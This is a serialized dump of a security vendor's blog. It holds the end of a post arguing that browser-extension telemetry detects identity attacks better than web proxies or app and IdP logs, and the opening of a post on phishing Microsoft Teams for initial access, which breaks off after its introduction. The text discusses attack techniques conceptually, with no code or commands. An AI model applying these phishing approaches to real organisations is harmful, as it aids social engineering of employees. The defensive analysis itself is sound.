in the browser, let’s take a deeper look at the web proxy situation.",{"data":56877,"content":56878,"nodeType":1009},{},[56879],{"data":56880,"marks":56881,"value":56882,"nodeType":864},{},[],"Detection based on web proxy – how does it work and what are the limitations?",{"data":56884,"content":56885,"nodeType":860},{},[56886],{"data":56887,"marks":56888,"value":56889,"nodeType":864},{},[],"Web proxies generate common data points that can be used for threat detection, particularly when looking for indicators of an endpoint compromise. They work by inspecting network traffic to and from the endpoint, which includes web activity in the browser. ",{"data":56891,"content":56892,"nodeType":860},{},[56893],{"data":56894,"marks":56895,"value":56896,"nodeType":864},{},[],"The classic use case would be inspecting traffic from an endpoint to networked servers and devices, either on the local network or over the internet (e.g. via VPN), to detect signs of suspicious/malicious behavior from the device (indicating a potential compromise). Data is then shipped to a central proxy server where it can be analyzed for indicators of malicious activity. ",{"data":56898,"content":56899,"nodeType":860},{},[56900],{"data":56901,"marks":56902,"value":56903,"nodeType":864},{},[],"The traditional proxy setup has a number of limitations: ",{"data":56905,"content":56906,"nodeType":941},{},[56907],{"data":56908,"content":56909,"nodeType":945},{},[56910],{"data":56911,"content":56912,"nodeType":860},{},[56913,56918],{"data":56914,"marks":56915,"value":56917,"nodeType":864},{},[56916],{"type":899},"The proxy needs to be in a position to intercept traffic.",{"data":56919,"marks":56920,"value":56921,"nodeType":864},{},[]," It may only be active when a user is in the office, on a VPN and/or for external web traffic only. It might not work if a user is on their home or other other Wi-Fi – e.g. when working from Starbucks, or visiting a customer site, which isn’t an ideal setup in the era of remote working.  ",{"data":56923,"content":56924,"nodeType":941},{},[56925],{"data":56926,"content":56927,"nodeType":945},{},[56928],{"data":56929,"content":56930,"nodeType":860},{},[56931,56936],{"data":56932,"marks":56933,"value":56935,"nodeType":864},{},[56934],{"type":899},"Most web traffic is protected by TLS – so a proxy has to decrypt this to inspect what’s inside.",{"data":56937,"marks":56938,"value":56939,"nodeType":864},{},[]," At the very least you’re going to need to deploy a CA cert to every endpoint. But, some websites use things like certificate pinning or other SSL-enforcement controls to straight up prevent this. Unless you’re doing TLS-termination at scale with a COTS solution, then the ability to do proxy-based monitoring is seriously limited. ",{"data":56941,"content":56942,"nodeType":1312},{},[56943],{"data":56944,"marks":56945,"value":56946,"nodeType":864},{},[],"Proxies under the hood",{"data":56948,"content":56949,"nodeType":860},{},[56950],{"data":56951,"marks":56952,"value":56953,"nodeType":864},{},[],"Let’s pop the hood and take a look at the data you can collect using a web proxy that is useful for threat detection. ",{"data":56955,"content":56956,"nodeType":860},{},[56957,56961,56970],{"data":56958,"marks":56959,"value":56960,"nodeType":864},{},[],"Typically, you’re looking at data points such as domain names or IP addresses. If the proxy is terminating TLS, you might also have web URLs, the type of web content accessed, and other HTTP-level metadata. Higher level data like file uploads/downloads can sometimes be reconstructed when using very vanilla methods. More advanced proxies might run or open downloaded files in a sandbox for dynamic analysis to identify potentially malicious properties, which has ",{"data":56962,"content":56964,"nodeType":883},{"uri":56963},"https://www.cyfirma.com/research/html-smuggling-a-stealthier-approach-to-deliver-malware/",[56965],{"data":56966,"marks":56967,"value":56969,"nodeType":864},{},[56968],{"type":1455},"given rise to techniques like HTML smuggling",{"data":56971,"marks":56972,"value":56973,"nodeType":864},{},[]," to hide these file downloads from advanced proxies. ",{"data":56975,"content":56976,"nodeType":860},{},[56977],{"data":56978,"marks":56979,"value":56980,"nodeType":864},{},[],"In practice this means that you might see that an endpoint at IP address X accessed google.com. If it’s an authenticated proxy, you might see the user of the endpoint as well. Using this data, it’s possible to see which endpoint’s owner accessed the web domain, but not the identity/account they used, or whether they actually logged in at all. So for the majority of in-house proxy setups not doing TLS-termination… that’s it. Even then, without decrypting TLS you can’t be sure you’re seeing the actual/final domain because of technologies like domain fronting that are commonly implemented in modern CDNs. ",{"data":56982,"content":56983,"nodeType":860},{},[56984,56988],{"data":56985,"marks":56986,"value":56987,"nodeType":864},{},[],"With TLS termination, it’s possible to see a lot more by inspecting/unpacking the HTTP data. At this point there are two possible approaches: Manual analysis after the fact, or automated analysis on the fly. ",{"data":56989,"marks":56990,"value":56992,"nodeType":864},{},[56991],{"type":899},"Unfortunately, there are problems with both options. ",{"data":56994,"content":56995,"nodeType":941},{},[56996,57016],{"data":56997,"content":56998,"nodeType":945},{},[56999],{"data":57000,"content":57001,"nodeType":860},{},[57002,57007,57011],{"data":57003,"marks":57004,"value":57006,"nodeType":864},{},[57005],{"type":899},"There is too much HTTP data to store and manually analyze everything:",{"data":57008,"marks":57009,"value":57010,"nodeType":864},{},[]," Usually, organizations limit the data being stored to specific metadata as opposed to trying to store everything (terabytes of data per day), which would be impossibly expensive to store (and also to build the server infrastructure required to index and search it – effectively a mini-datacenter). ",{"data":57012,"marks":57013,"value":57015,"nodeType":864},{},[57014],{"type":2246},"Not to mention that storing detailed HTTP body data presents a significant security risk, as it includes valid session tokens/cookies for all your identities…  ",{"data":57017,"content":57018,"nodeType":945},{},[57019],{"data":57020,"content":57021,"nodeType":860},{},[57022,57027,57031],{"data":57023,"marks":57024,"value":57026,"nodeType":864},{},[57025],{"type":899},"Each web app is custom, making automated analysis (virtually) impossible:",{"data":57028,"marks":57029,"value":57030,"nodeType":864},{},[]," Proxy-based solutions have to reconstruct the data after TLS encryption. HTTP data is usually stored in large application JSON/XML objects or even in totally custom encoding – per each app. This means that complex, custom code is required per each app to be able to perform automated analysis. When businesses today are using hundreds of apps on average, ",{"data":57032,"marks":57033,"value":57035,"nodeType":864},{},[57034],{"type":899},"automating this process is not feasible as it requires constant reverse engineering of every web app. ",{"data":57037,"content":57038,"nodeType":860},{},[57039],{"data":57040,"marks":57041,"value":57042,"nodeType":864},{},[],"So what does this mean? Well, even organizations with a TLS-terminating proxy are limited to manual analysis of select metadata after-the-fact, which massively reduces its utility. You could sink a day or more’s analysis into gathering a small amount of useful data, for example whether a URL was accessed, but not necessarily which device/user, or what account/creds were used to log in). This means you’re probably going to use proxy data to aid in the investigation of a known incident rather than anything proactive. ",{"data":57044,"content":57045,"nodeType":860},{},[57046,57051,57057],{"data":57047,"marks":57048,"value":57050,"nodeType":864},{},[57049],{"type":899},"It might be ",{"data":57052,"marks":57053,"value":57056,"nodeType":864},{},[57054,57055],{"type":2246},{"type":899},"theoretically",{"data":57058,"marks":57059,"value":57061,"nodeType":864},{},[57060],{"type":899}," possible to sift through decrypted HTTP data to identify and correlate identities and actions, effectively reconstructing web pages from the network traffic automatically and on the fly (in the same way that it’s theoretically possible to remove my head and transplant it onto your body), but is it practical or reasonable for most organizations to do this? No. ",{"data":57063,"content":57064,"nodeType":1009},{},[57065],{"data":57066,"marks":57067,"value":57069,"nodeType":864},{},[57068],{"type":899},"Browser data: a better alternative?",{"data":57071,"content":57072,"nodeType":860},{},[57073],{"data":57074,"marks":57075,"value":57076,"nodeType":864},{},[],"One way of overcoming some of the limitations of the classic web proxy setup is to use a browser-based solution. It’s much easier to collect data at the browser level before it’s encrypted. ",{"data":57078,"content":57079,"nodeType":860},{},[57080],{"data":57081,"marks":57082,"value":57083,"nodeType":864},{},[],"A browser agent isn’t just a proxy for pre-TLS HTML data, though. In the browser, you’re able to dynamically interact with the DOM or the rendered web application, including its JS code. This makes it easy to find, for example, input fields for usernames and passwords. You can see what information the user is inputting and where, without needing to figure out how the data is encoded and sent back to the app. These are fairly generic fields that can be identified across your suite of apps without needing complex custom code. To put it in perspective, approximately 10 login cases cover the entirety of the SaaS apps we support (~1000). Using a proxy-based solution, each of these would require custom development.   ",{"data":57085,"content":57086,"nodeType":860},{},[57087],{"data":57088,"marks":57089,"value":57090,"nodeType":864},{},[],"While it's technically possible to keep track of multiple sessions for thousands of users across hundreds of apps via proxy, it’s no mean feat – made much easier when each extension is tracking one user, in one browser, and even knows the browser tab it’s running in. You also get additional context at the identity layer such as the email address, authentication protocol, and credentials used, neatly mapped to that specific user and browser profile – no more trying to link the owner of an IP address to log events!",{"data":57092,"content":57093,"nodeType":860},{},[57094],{"data":57095,"marks":57096,"value":57097,"nodeType":864},{},[],"The browser also has the added benefit of being a natural enforcement point. You can collect and analyze data dynamically, and produce an immediate response – rather than taking info away, analyzing it, and coming back with a detection minutes or hours later (and potentially prompting a manual response). ",{"data":57099,"content":57100,"nodeType":860},{},[57101],{"data":57102,"marks":57103,"value":57104,"nodeType":864},{},[],"Let’s look at a couple of examples based on how we’re using our browser agent to detect and block identity attacks. ",{"data":57106,"content":57107,"nodeType":941},{},[57108,57129,57149],{"data":57109,"content":57110,"nodeType":945},{},[57111],{"data":57112,"content":57113,"nodeType":860},{},[57114,57117,57125],{"data":57115,"marks":57116,"value":21,"nodeType":864},{},[],{"data":57118,"content":57119,"nodeType":883},{"uri":24354},[57120],{"data":57121,"marks":57122,"value":57124,"nodeType":864},{},[57123],{"type":1455},"Pinning passwords to the legitimate site they are linked with",{"data":57126,"marks":57127,"value":57128,"nodeType":864},{},[],". This is made possible by interacting with the DOM to observe passwords being entered – enabling the Push agent to intercept and block before an HTTP network request can even be made. ",{"data":57130,"content":57131,"nodeType":945},{},[57132],{"data":57133,"content":57134,"nodeType":860},{},[57135,57138,57145],{"data":57136,"marks":57137,"value":21,"nodeType":864},{},[],{"data":57139,"content":57140,"nodeType":883},{"uri":54487},[57141],{"data":57142,"marks":57143,"value":57144,"nodeType":864},{},[],"Detecting and blocking malicious phishing tools",{"data":57146,"marks":57147,"value":57148,"nodeType":864},{},[]," running on websites by observing behavioral attributes in the browser, such as Javascript calls being made or data structures saved to local storage.",{"data":57150,"content":57151,"nodeType":945},{},[57152],{"data":57153,"content":57154,"nodeType":860},{},[57155,57158,57166],{"data":57156,"marks":57157,"value":21,"nodeType":864},{},[],{"data":57159,"content":57161,"nodeType":883},{"uri":57160},"https://pushsecurity.com/blog/manage-third-party-data-access/",[57162],{"data":57163,"marks":57164,"value":57165,"nodeType":864},{},[],"Observing users signing up to and using risky apps",{"data":57167,"marks":57168,"value":57169,"nodeType":864},{},[],", or changing or removing authentication methods, MFA methods, and configuration methods, which could indicate account takeover. ",{"data":57171,"content":57172,"nodeType":860},{},[57173],{"data":57174,"marks":57175,"value":57176,"nodeType":864},{},[],"It’s always useful to refer back to the concept of the Pyramid of Pain in these situations. The opportunities to detect and block in the browser tend to align with indicators at the apex of the pyramid, meaning they are a significant obstruction for attackers – and difficult to circumvent. This contrasts the indicators aligned with proxy-based solutions, which are much easier to bypass through, for example, IP masking using residential proxy networks, or changing the domains and URLs used for phishing campaigns.  ",{"data":57178,"content":57182,"nodeType":996},{"target":57179},{"sys":57180},{"id":57181,"type":1001,"linkType":1002},"HrK2xQak6KfjInDbeSgv8",[],{"data":57184,"content":57185,"nodeType":860},{},[57186],{"data":57187,"marks":57188,"value":57189,"nodeType":864},{},[],"In summary: Browser data provides high-fidelity indicators of malicious activity, without the complications of proxy-based approaches. The scope for response in the browser is significant and immediate, meaning it’s a great enforcement point for security controls to be able to disrupt attacks. ",{"data":57191,"content":57192,"nodeType":1009},{},[57193],{"data":57194,"marks":57195,"value":57196,"nodeType":864},{},[],"Won’t my app and IdP logs cover this?",{"data":57198,"content":57199,"nodeType":860},{},[57200],{"data":57201,"marks":57202,"value":57203,"nodeType":864},{},[],"App and IdP logs are useful (when you can get them), but neither give you the full picture. ",{"data":57205,"content":57206,"nodeType":1312},{},[57207],{"data":57208,"marks":57209,"value":57210,"nodeType":864},{},[],"App logs are limited in availability, scope, and ease of ingestion ",{"data":57212,"content":57213,"nodeType":860},{},[57214,57218,57227],{"data":57215,"marks":57216,"value":57217,"nodeType":864},{},[],"When relying on app logs, you’re naturally constrained by the app provider. Many smaller apps provide no security logging, while others ",{"data":57219,"content":57221,"nodeType":883},{"uri":57220},"https://audit-logs.tax/",[57222],{"data":57223,"marks":57224,"value":57226,"nodeType":864},{},[57225],{"type":1455},"lock security logging behind the premium tier subscription",{"data":57228,"marks":57229,"value":57230,"nodeType":864},{},[],". When logs are available, you’re limited to the events that the third-party deems suitable to log. ",{"data":57232,"content":57233,"nodeType":860},{},[57234],{"data":57235,"marks":57236,"value":57237,"nodeType":864},{},[],"Out of the 100 most popular apps we see across our customers, and perhaps the few dozen or so that are security critical, only a small handful provide any useful logging. This means, naturally, that the majority of apps do not. ",{"data":57239,"content":57240,"nodeType":860},{},[57241],{"data":57242,"marks":57243,"value":57244,"nodeType":864},{},[],"To top it all off, the process of extracting these logs and feeding them into your SIEM (or equivalent) is also not straightforward. The lack of out-of-the-box connectors for many apps means that complex custom architectures are required for collecting data. Some vendors place constraints on the format and mechanism for extracting logs which can make ingestion difficult to feed reliable detections – even before any meaningful analysis of the data can take place. ",{"data":57246,"content":57247,"nodeType":860},{},[57248],{"data":57249,"marks":57250,"value":57251,"nodeType":864},{},[],"Until application security logs are made widely available (and at no additional cost) it’s unlikely you’re going to be able to get the visibility you need from app logs, for every app your employees use (though of course there are exceptions – and we hope to see more vendors in future treating security as a minimum requirement, not a chargeable addon). ",{"data":57253,"content":57254,"nodeType":1312},{},[57255],{"data":57256,"marks":57257,"value":57258,"nodeType":864},{},[],"IdP logs cover only SSO integrated apps and are limited in scope",{"data":57260,"content":57261,"nodeType":860},{},[57262],{"data":57263,"marks":57264,"value":57265,"nodeType":864},{},[],"You might think, “but all of our business apps are behind SSO, right?” In reality, only about 1 in 3 apps support SSO (and even fewer at the ‘free’ tier). And in practice, our data shows us that only 1 in 5 apps on average are actually behind SSO per organization. The theoretical security benefit of IdP logs is that they provide context, a foundation for the user’s activity across (and between) a suite of apps. But because of the lack of coverage, this isn’t the case. ",{"data":57267,"content":57268,"nodeType":860},{},[57269],{"data":57270,"marks":57271,"value":57272,"nodeType":864},{},[],"IdP logs are naturally focused on authentication, and so don’t compensate for any gaps in app logging. Naturally, they are only able to observe what happens on the IdP side – and so are blind to client side attacks like phishing (which we’ve already shown the browser provides superior visibility of compared to typical alternatives like proxy logs).   ",{"data":57274,"content":57275,"nodeType":1312},{},[57276],{"data":57277,"marks":57278,"value":57279,"nodeType":864},{},[],"Browser is best for stopping identity attacks",{"data":57281,"content":57282,"nodeType":860},{},[57283],{"data":57284,"marks":57285,"value":57286,"nodeType":864},{},[],"This is where the browser comes in. Think of your browser as your source of truth, a broad data baseline for user activity where the browser provides complete context of the browser profile, employee, accounts, credentials, auth methods, and MFA types – as well as employee interaction with web sites.",{"data":57288,"content":57289,"nodeType":860},{},[57290],{"data":57291,"marks":57292,"value":57293,"nodeType":864},{},[],"The TL;DR is that your visibility in the browser is theoretically limitless. Every page loaded (and its source, javascript state, local storage), every user interaction can be observed. And best of all, this analysis is done securely in the browser and only the results of detections are reported back, rather than decrypting the entire raw traffic stream including all session data in an additional centralized system. ",{"data":57295,"content":57299,"nodeType":996},{"target":57296},{"sys":57297},{"id":57298,"type":1001,"linkType":1002},"5jPCGPO1tnIkoI7MKW4oUi",[],{"data":57301,"content":57302,"nodeType":1009},{},[57303],{"data":57304,"marks":57305,"value":24968,"nodeType":864},{},[],{"data":57307,"content":57308,"nodeType":860},{},[57309],{"data":57310,"marks":57311,"value":57312,"nodeType":864},{},[],"As an industry, we need to start looking at browser-based detection and response as the next logical evolution to stop identity attacks. There are clear parallels with the emergence of EDR – which came about because existing endpoint log sources were not sufficient. Today, we wouldn’t dream of trying to detect and respond to endpoint-based attacks without EDR – it’s time we started thinking about cloud identity attacks and the browser in the same way.  ","The web proxy is dead… long live the browser extension!","Right now the majority of detections for identity attacks rely on web proxy telemetry. Here’s why the browser can be a better alternative.","2024-06-11T00:00:00.000Z","the-web-proxy-is-dead-long-live-the-browser-extension",{"items":57318},[57319,57321],{"sys":57320,"name":342},{"id":6596},{"sys":57322,"name":6593},{"id":6592},{"items":57324},[57325],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":57326},{"url":2740},{"__typename":2059,"sys":57328,"content":57329,"title":48848,"synopsis":48849,"hashTags":59,"publishedDate":48850,"slug":48851,"tagsCollection":57603,"authorsCollection":57609},{"id":48534},{"json":57330},{"data":57331,"content":57332,"nodeType":856},{},[57333,57339,57355,57368,57374,57380,57383,57389,57395,57443,57449,57454,57457,57463,57469,57475,57481,57487,57501,57506,57512,57518,57532,57537,57543,57549,57555,57561,57567,57570,57576,57592,57597],{"data":57334,"content":57335,"nodeType":1009},{},[57336],{"data":57337,"marks":57338,"value":48545,"nodeType":864},{},[],{"data":57340,"content":57341,"nodeType":860},{},[57342,57345,57352],{"data":57343,"marks":57344,"value":48552,"nodeType":864},{},[],{"data":57346,"content":57347,"nodeType":883},{"uri":7425},[57348],{"data":57349,"marks":57350,"value":48560,"nodeType":864},{},[57351],{"type":1455},{"data":57353,"marks":57354,"value":10094,"nodeType":864},{},[],{"data":57356,"content":57357,"nodeType":860},{},[57358,57361,57365],{"data":57359,"marks":57360,"value":48570,"nodeType":864},{},[],{"data":57362,"marks":57363,"value":48575,"nodeType":864},{},[57364],{"type":1455},{"data":57366,"marks":57367,"value":48579,"nodeType":864},{},[],{"data":57369,"content":57370,"nodeType":860},{},[57371],{"data":57372,"marks":57373,"value":48586,"nodeType":864},{},[],{"data":57375,"content":57376,"nodeType":860},{},[57377],{"data":57378,"marks":57379,"value":48593,"nodeType":864},{},[],{"data":57381,"content":57382,"nodeType":1005},{},[],{"data":57384,"content":57385,"nodeType":1312},{},[57386],{"data":57387,"marks":57388,"value":48603,"nodeType":864},{},[],{"data":57390,"content":57391,"nodeType":860},{},[57392],{"data":57393,"marks":57394,"value":48610,"nodeType":864},{},[],{"data":57396,"content":57397,"nodeType":941},{},[57398,57407,57416,57425,57434],{"data":57399,"content":57400,"nodeType":945},{},[57401],{"data":57402,"content":57403,"nodeType":860},{},[57404],{"data":57405,"marks":57406,"value":48623,"nodeType":864},{},[],{"data":57408,"content":57409,"nodeType":945},{},[57410],{"data":57411,"content":57412,"nodeType":860},{},[57413],{"data":57414,"marks":57415,"value":48633,"nodeType":864},{},[],{"data":57417,"content":57418,"nodeType":945},{},[57419],{"data":57420,"content":57421,"nodeType":860},{},[57422],{"data":57423,"marks":57424,"value":48643,"nodeType":864},{},[],{"data":57426,"content":57427,"nodeType":945},{},[57428],{"data":57429,"content":57430,"nodeType":860},{},[57431],{"data":57432,"marks":57433,"value":48653,"nodeType":864},{},[],{"data":57435,"content":57436,"nodeType":945},{},[57437],{"data":57438,"content":57439,"nodeType":860},{},[57440],{"data":57441,"marks":57442,"value":48663,"nodeType":864},{},[],{"data":57444,"content":57445,"nodeType":860},{},[57446],{"data":57447,"marks":57448,"value":48670,"nodeType":864},{},[],{"data":57450,"content":57453,"nodeType":996},{"target":57451},{"sys":57452},{"id":48675,"type":1001,"linkType":1002},[],{"data":57455,"content":57456,"nodeType":1005},{},[],{"data":57458,"content":57459,"nodeType":1312},{},[57460],{"data":57461,"marks":57462,"value":48686,"nodeType":864},{},[],{"data":57464,"content":57465,"nodeType":860},{},[57466],{"data":57467,"marks":57468,"value":48693,"nodeType":864},{},[],{"data":57470,"content":57471,"nodeType":860},{},[57472],{"data":57473,"marks":57474,"value":48700,"nodeType":864},{},[],{"data":57476,"content":57477,"nodeType":860},{},[57478],{"data":57479,"marks":57480,"value":48707,"nodeType":864},{},[],{"data":57482,"content":57483,"nodeType":860},{},[57484],{"data":57485,"marks":57486,"value":48714,"nodeType":864},{},[],{"data":57488,"content":57489,"nodeType":1312},{},[57490,57493,57498],{"data":57491,"marks":57492,"value":48721,"nodeType":864},{},[],{"data":57494,"marks":57495,"value":48727,"nodeType":864},{},[57496,57497],{"type":1455},{"type":899},{"data":57499,"marks":57500,"value":48731,"nodeType":864},{},[],{"data":57502,"content":57505,"nodeType":996},{"target":57503},{"sys":57504},{"id":48736,"type":1001,"linkType":1002},[],{"data":57507,"content":57508,"nodeType":860},{},[57509],{"data":57510,"marks":57511,"value":48744,"nodeType":864},{},[],{"data":57513,"content":57514,"nodeType":860},{},[57515],{"data":57516,"marks":57517,"value":48751,"nodeType":864},{},[],{"data":57519,"content":57520,"nodeType":1312},{},[57521,57524,57529],{"data":57522,"marks":57523,"value":48758,"nodeType":864},{},[],{"data":57525,"marks":57526,"value":3053,"nodeType":864},{},[57527,57528],{"type":1455},{"type":899},{"data":57530,"marks":57531,"value":48767,"nodeType":864},{},[],{"data":57533,"content":57536,"nodeType":996},{"target":57534},{"sys":57535},{"id":48772,"type":1001,"linkType":1002},[],{"data":57538,"content":57539,"nodeType":860},{},[57540],{"data":57541,"marks":57542,"value":48780,"nodeType":864},{},[],{"data":57544,"content":57545,"nodeType":860},{},[57546],{"data":57547,"marks":57548,"value":48787,"nodeType":864},{},[],{"data":57550,"content":57551,"nodeType":860},{},[57552],{"data":57553,"marks":57554,"value":48794,"nodeType":864},{},[],{"data":57556,"content":57557,"nodeType":860},{},[57558],{"data":57559,"marks":57560,"value":48801,"nodeType":864},{},[],{"data":57562,"content":57563,"nodeType":860},{},[57564],{"data":57565,"marks":57566,"value":48808,"nodeType":864},{},[],{"data":57568,"content":57569,"nodeType":1005},{},[],{"data":57571,"content":57572,"nodeType":1009},{},[57573],{"data":57574,"marks":57575,"value":40331,"nodeType":864},{},[],{"data":57577,"content":57578,"nodeType":860},{},[57579,57582,57589],{"data":57580,"marks":57581,"value":48824,"nodeType":864},{},[],{"data":57583,"content":57584,"nodeType":883},{"uri":5642},[57585],{"data":57586,"marks":57587,"value":40352,"nodeType":864},{},[57588],{"type":1455},{"data":57590,"marks":57591,"value":48835,"nodeType":864},{},[],{"data":57593,"content":57596,"nodeType":996},{"target":57594},{"sys":57595},{"id":48840,"type":1001,"linkType":1002},[],{"data":57598,"content":57599,"nodeType":860},{},[57600],{"data":57601,"marks":57602,"value":21,"nodeType":864},{},[],{"items":57604},[57605,57607],{"sys":57606,"name":6593},{"id":6592},{"sys":57608,"name":342},{"id":6596},{"items":57610},[57611],{"fullName":4878,"firstName":4879,"jobTitle":851,"profilePicture":57612},{"url":4881},"blog/how-aitm-phishing-kits-evade-detection",{"json":57615},{"data":57616,"content":57617,"nodeType":856},{},[57618],{"data":57619,"content":57620,"nodeType":860},{},[57621],{"data":57622,"marks":57623,"value":57624,"nodeType":864},{},[],"Attackers are getting creative with their AitM phishing toolkits, using several tricks to hide from the prying eyes of security teams and threat intelligence vendors. We decided to pick apart one toolkit to see exactly how it tries to hide its malicious intent. ",{"id":53479,"publishedAt":57626},"2026-08-12T11:55:08.899Z",{"items":57628},[57629,57631],{"sys":57630,"name":342},{"id":6596},{"sys":57632,"name":6593},{"id":6592},{"items":57634},[57635,57637,57639,57641,57643,57645,57647,57649,57651,57653,57655],{"sys":57636,"name":519,"slug":520,"tier":31},{"id":516},{"sys":57638,"name":279,"slug":280,"tier":31},{"id":276},{"sys":57640,"name":342,"slug":343,"tier":31},{"id":339},{"sys":57642,"name":297,"slug":298,"tier":31},{"id":294},{"sys":57644,"name":261,"slug":262,"tier":45},{"id":258},{"sys":57646,"name":511,"slug":512,"tier":45},{"id":508},{"sys":57648,"name":324,"slug":325,"tier":45},{"id":321},{"sys":57650,"name":466,"slug":467,"tier":45},{"id":463},{"sys":57652,"name":351,"slug":352,"tier":45},{"id":348},{"sys":57654,"name":431,"slug":432,"tier":45},{"id":428},{"sys":57656,"name":404,"slug":405,"tier":45},{"id":401},"jHS5vkiDEsizIjfYF2kO8Pg6FqSyvcmhDBwzUIrvkrM",{"id":57659,"title":57660,"authorsCollection":57661,"content":57666,"extension":228,"faqItemsCollection":58477,"faqTitle":59,"featured":6,"hashTags":59,"meta":58479,"metaTitle":58480,"ogImage":59,"postType":5740,"publishedDate":58481,"relatedBlogPostsCollection":58482,"slug":58484,"stem":58485,"subtitle":59,"summary":58486,"synopsis":58497,"sys":58498,"tagsCollection":58501,"topicsCollection":58507,"__hash__":58527},"blog/blog/phishing-microsoft-teams-for-initial-access.json","Phishing Microsoft Teams for initial access",{"items":57662},[57663],{"fullName":4949,"firstName":4950,"jobTitle":4951,"socialLinks":57664,"profilePicture":57665},[4953],{"url":4955},{"json":57667,"links":58378},{"data":57668,"content":57669,"nodeType":856},{},[57670,57677,57727,57734,57741,57784,57791,57799,57806,57813,57820,57827,57860,57867,57912,57918,57925,57932,57939,57946,57953,57960,57967,57974,57980,57986,57993,58000,58006,58013,58020,58027,58034,58041,58066,58073,58080,58087,58094,58100,58107,58113,58120,58127,58133,58140,58148,58155,58162,58168,58175,58181,58188,58195,58202,58209,58216,58222,58228,58235,58242,58248,58255,58262,58269,58276,58282,58289,58296,58339,58345,58352,58359,58366,58372],{"data":57671,"content":57672,"nodeType":860},{},[57673],{"data":57674,"marks":57675,"value":57676,"nodeType":864},{},[],"We previously wrote two articles about phishing via Slack, the first for the initial access kill chain phase and the second for lateral movement and persistence. For those interested, the links are below:",{"data":57678,"content":57679,"nodeType":941},{},[57680,57704],{"data":57681,"content":57682,"nodeType":945},{},[57683],{"data":57684,"content":57685,"nodeType":860},{},[57686,57689,57701],{"data":57687,"marks":57688,"value":21,"nodeType":864},{},[],{"data":57690,"content":57694,"nodeType":57700},{"target":57691},{"sys":57692},{"id":57693,"type":1001,"linkType":1002},"2rjLrCo6KWwLicfpV2qTOZ",[57695],{"data":57696,"marks":57697,"value":57699,"nodeType":864},{},[57698],{"type":1455},"Phishing through Slack for initial access","entry-hyperlink",{"data":57702,"marks":57703,"value":21,"nodeType":864},{},[],{"data":57705,"content":57706,"nodeType":945},{},[57707],{"data":57708,"content":57709,"nodeType":860},{},[57710,57713,57724],{"data":57711,"marks":57712,"value":21,"nodeType":864},{},[],{"data":57714,"content":57718,"nodeType":57700},{"target":57715},{"sys":57716},{"id":57717,"type":1001,"linkType":1002},"1hU7XNIizp4vQXsiiQmqvI",[57719],{"data":57720,"marks":57721,"value":57723,"nodeType":864},{},[57722],{"type":1455},"Phishing Slack for lateral movement and persistence",{"data":57725,"marks":57726,"value":21,"nodeType":864},{},[],{"data":57728,"content":57729,"nodeType":860},{},[57730],{"data":57731,"marks":57732,"value":57733,"nodeType":864},{},[],"Some readers asked what this looks like for Microsoft Teams and so we decided to write this article to show what similar attacks look like via Teams.",{"data":57735,"content":57736,"nodeType":860},{},[57737],{"data":57738,"marks":57739,"value":57740,"nodeType":864},{},[],"We’ll primarily be using the following SaaS attack techniques chained together:",{"data":57742,"content":57743,"nodeType":941},{},[57744,57764],{"data":57745,"content":57746,"nodeType":945},{},[57747],{"data":57748,"content":57749,"nodeType":860},{},[57750,57753,57761],{"data":57751,"marks":57752,"value":21,"nodeType":864},{},[],{"data":57754,"content":57756,"nodeType":883},{"uri":57755},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/im_phishing/description.md",[57757],{"data":57758,"marks":57759,"value":57760,"nodeType":864},{},[],"SAT1018 - IM phishing",{"data":57762,"marks":57763,"value":21,"nodeType":864},{},[],{"data":57765,"content":57766,"nodeType":945},{},[57767],{"data":57768,"content":57769,"nodeType":860},{},[57770,57773,57781],{"data":57771,"marks":57772,"value":21,"nodeType":864},{},[],{"data":57774,"content":57776,"nodeType":883},{"uri":57775},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/im_user_spoofing/description.md",[57777],{"data":57778,"marks":57779,"value":57780,"nodeType":864},{},[],"SAT1019 - IM user spoofing",{"data":57782,"marks":57783,"value":21,"nodeType":864},{},[],{"data":57785,"content":57786,"nodeType":1009},{},[57787],{"data":57788,"marks":57789,"value":57790,"nodeType":864},{},[],"Why focus on instant messengers?",{"data":57792,"content":57793,"nodeType":860},{},[57794],{"data":57795,"marks":57796,"value":57798,"nodeType":864},{},[57797],{"type":2246},"If you’ve read either of the previous articles on Slack, you can skip this introductory piece and jump straight to the next section.",{"data":57800,"content":57801,"nodeType":860},{},[57802],{"data":57803,"marks":57804,"value":57805,"nodeType":864},{},[],"They aren’t new, however, the original focus of IM apps was on internal communication and phishing and social engineering attacks are often external. Email remained the standards-based protocol that enabled external communication no matter what email vendor was in use. In recent years, however, instant messengers (IM) have become the primary method of communication for many businesses. I wanted to focus on IM here because if that’s where employees are communicating, it’s the best place to launch attacks against them. Even better, there’s a history of users placing a higher degree of trust in IM platforms than email, so it becomes a potentially easy target.",{"data":57807,"content":57808,"nodeType":860},{},[57809],{"data":57810,"marks":57811,"value":57812,"nodeType":864},{},[],"While IM platforms were initially used solely for internal communications, organizations quickly realized that IM platforms could be used to communicate with external groups, individuals, freelancers, and contractors, with the hope of fewer emails and more instant communications. ",{"data":57814,"content":57815,"nodeType":860},{},[57816],{"data":57817,"marks":57818,"value":57819,"nodeType":864},{},[],"We now have Slack Connect and Microsoft Teams external access to support this, with Slack Connect introduced in June 2020 and Teams introducing it in January 2022. This external access has increased the attack surface of these platforms considerably.",{"data":57821,"content":57822,"nodeType":860},{},[57823],{"data":57824,"marks":57825,"value":57826,"nodeType":864},{},[],"Despite decades of security research, email security appliances and user security training, email-based phishing and social engineering is still commonly successful. Now we have instant messenger platforms with:",{"data":57828,"content":57829,"nodeType":941},{},[57830,57840,57850],{"data":57831,"content":57832,"nodeType":945},{},[57833],{"data":57834,"content":57835,"nodeType":860},{},[57836],{"data":57837,"marks":57838,"value":57839,"nodeType":864},{},[],"Richer functionality than email, ",{"data":57841,"content":57842,"nodeType":945},{},[57843],{"data":57844,"content":57845,"nodeType":860},{},[57846],{"data":57847,"marks":57848,"value":57849,"nodeType":864},{},[],"Lacking centralized security gateways and other security controls common to email and ",{"data":57851,"content":57852,"nodeType":945},{},[57853],{"data":57854,"content":57855,"nodeType":860},{},[57856],{"data":57857,"marks":57858,"value":57859,"nodeType":864},{},[],"Unfamiliar as a threat vector to your average user compared with email. ",{"data":57861,"content":57862,"nodeType":860},{},[57863],{"data":57864,"marks":57865,"value":57866,"nodeType":864},{},[],"There’s also a sense of urgency associated with IM messages due to the conversational nature compared with emails. Combined with a history of increased trust, we have the ingredients for increased social engineering 